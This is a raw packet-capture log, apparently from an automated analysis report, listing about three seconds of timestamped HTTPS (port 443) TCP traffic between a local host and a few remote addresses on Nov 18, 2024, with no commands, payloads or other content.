                                            Nov 18, 2024 21:16:56.073892117 CET4434987213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.073908091 CET49872443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.073914051 CET4434987213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.077827930 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.077883005 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.077980995 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.078182936 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.078198910 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.206023932 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.206373930 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.206684113 CET49873443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.206703901 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.207175016 CET49873443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.207179070 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.207443953 CET49874443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.207473040 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.207792997 CET49874443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.207798004 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.231791019 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.232548952 CET49875443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.232558012 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.233026028 CET49875443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.233030081 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.337624073 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.337698936 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.337795019 CET49874443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.338152885 CET49874443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.338165045 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.338182926 CET49874443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.338187933 CET4434987413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.339796066 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.339862108 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.339915037 CET49873443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.340085983 CET49873443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.340095997 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.340110064 CET49873443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.340114117 CET4434987313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.342006922 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.342031956 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.342128992 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.342277050 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.342286110 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.342529058 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.342580080 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.342639923 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.342840910 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.342858076 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.364558935 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.364598036 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.364644051 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.364778996 CET49875443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.364778996 CET49875443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.365098953 CET49875443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.365114927 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.365127087 CET49875443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.365132093 CET4434987513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.368832111 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.368860006 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.368977070 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.369199991 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.369213104 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.570641041 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.571161032 CET49876443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.571187019 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.571784019 CET49876443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.571790934 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.712255955 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.712424040 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.712491989 CET49876443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.712778091 CET49876443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.712793112 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.712805033 CET49876443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.712810040 CET4434987613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.717241049 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.717287064 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.717360020 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.717623949 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.717642069 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.823735952 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.824348927 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.824441910 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.824950933 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.824965000 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.953680038 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.953747034 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.953805923 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.954139948 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.954180002 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.954207897 CET49877443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.954224110 CET4434987713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.958255053 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.958328009 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:56.958421946 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.958580971 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:56.958617926 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.096281052 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.097157001 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.097234011 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.097800970 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.098131895 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.098146915 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.098680973 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.098704100 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.099550009 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.099555969 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.116863012 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.117357969 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.117379904 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.118068933 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.118082047 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.227737904 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.227957964 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.228056908 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.228265047 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.228282928 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.228293896 CET49878443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.228298903 CET4434987813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.229751110 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.229784966 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.229849100 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.229866982 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.229931116 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.230130911 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.230175018 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.230205059 CET49879443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.230221987 CET4434987913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.232315063 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.232355118 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.232482910 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.232573032 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.232614040 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.232649088 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.232669115 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.232681990 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.232877016 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.232889891 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.250685930 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.250756025 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.250824928 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.251075983 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.251090050 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.251101971 CET49880443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.251106024 CET4434988013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.254071951 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.254112959 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.254220009 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.254410982 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.254427910 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.453394890 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.454077959 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.454102039 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.454782009 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.454793930 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.582003117 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.582190037 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.582243919 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.582261086 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.582317114 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.582372904 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.582628965 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.582648039 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.582662106 CET49881443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.582667112 CET4434988113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.586519957 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.586566925 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.586641073 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.586896896 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.586918116 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.694309950 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.695106030 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.695162058 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.695620060 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.695633888 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.825299025 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.825572014 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.825669050 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.825812101 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.825833082 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.825891018 CET49882443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.825896025 CET4434988213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.829339981 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.829396009 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.829478025 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.829711914 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.829725981 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.958188057 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.958741903 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.958781004 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.959216118 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.959222078 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.983566046 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.984046936 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.984078884 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:57.984492064 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:57.984498024 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.002363920 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.002845049 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.002863884 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.003267050 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.003273010 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.009453058 CET44349834142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:16:58.009510994 CET44349834142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:16:58.009679079 CET49834443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:16:58.086838961 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.086915016 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.087006092 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.087321997 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.087341070 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.087352991 CET49884443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.087358952 CET4434988413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.090950012 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.090987921 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.091065884 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.091295004 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.091309071 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.112066031 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.112301111 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.112373114 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.112440109 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.112457991 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.112469912 CET49883443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.112476110 CET4434988313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.115149975 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.115190029 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.115267992 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.115425110 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.115437984 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.136790991 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.136825085 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.136872053 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.136893988 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.136934042 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.137134075 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.137155056 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.137166023 CET49885443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.137171984 CET4434988513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.139715910 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.139744043 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.139832973 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.140007973 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.140021086 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.319221020 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.320120096 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.320161104 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.320771933 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.320777893 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.446321964 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.447742939 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.447841883 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.447879076 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.447896957 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.447906971 CET49886443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.447911024 CET4434988613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.451915979 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.452013969 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.452155113 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.452301025 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.452323914 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.560946941 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.561605930 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.561620951 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.562275887 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.562280893 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.690057039 CET49834443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:16:58.690078020 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.690083981 CET44349834142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:16:58.690263987 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.690484047 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.690640926 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.690663099 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.690675974 CET49887443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.690682888 CET4434988713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.694968939 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.695013046 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.695091963 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.695261002 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.695276022 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.829581976 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.830466986 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.830497026 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.831124067 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.831130981 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.848892927 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.849370003 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.849399090 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.849890947 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.849895954 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.874326944 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.874883890 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.874907970 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.875384092 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.875390053 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.960083961 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.960403919 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.960542917 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.960602999 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.960602999 CET49888443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.960618019 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.960628033 CET4434988813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.964092016 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.964145899 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.964222908 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.964368105 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.964380980 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.978844881 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.978960991 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.979005098 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.979104996 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.979199886 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.979218006 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.979229927 CET49889443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.979234934 CET4434988913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.982522964 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.982559919 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:58.982691050 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.982851982 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:58.982862949 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.004540920 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.004868031 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.004950047 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.004977942 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.004992962 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.005004883 CET49890443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.005011082 CET4434989013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.008395910 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.008445978 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.008552074 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.008702993 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.008718014 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.190754890 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.191478968 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.191544056 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.192008018 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.192022085 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.327809095 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.328021049 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.328300953 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.328380108 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.328402042 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.328418016 CET49891443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.328423977 CET4434989113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.331720114 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.331758976 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.331850052 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.332012892 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.332030058 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.428669930 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.432095051 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.432120085 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.432666063 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.432676077 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.557219982 CET4434989213.107.246.45192.168.2.4
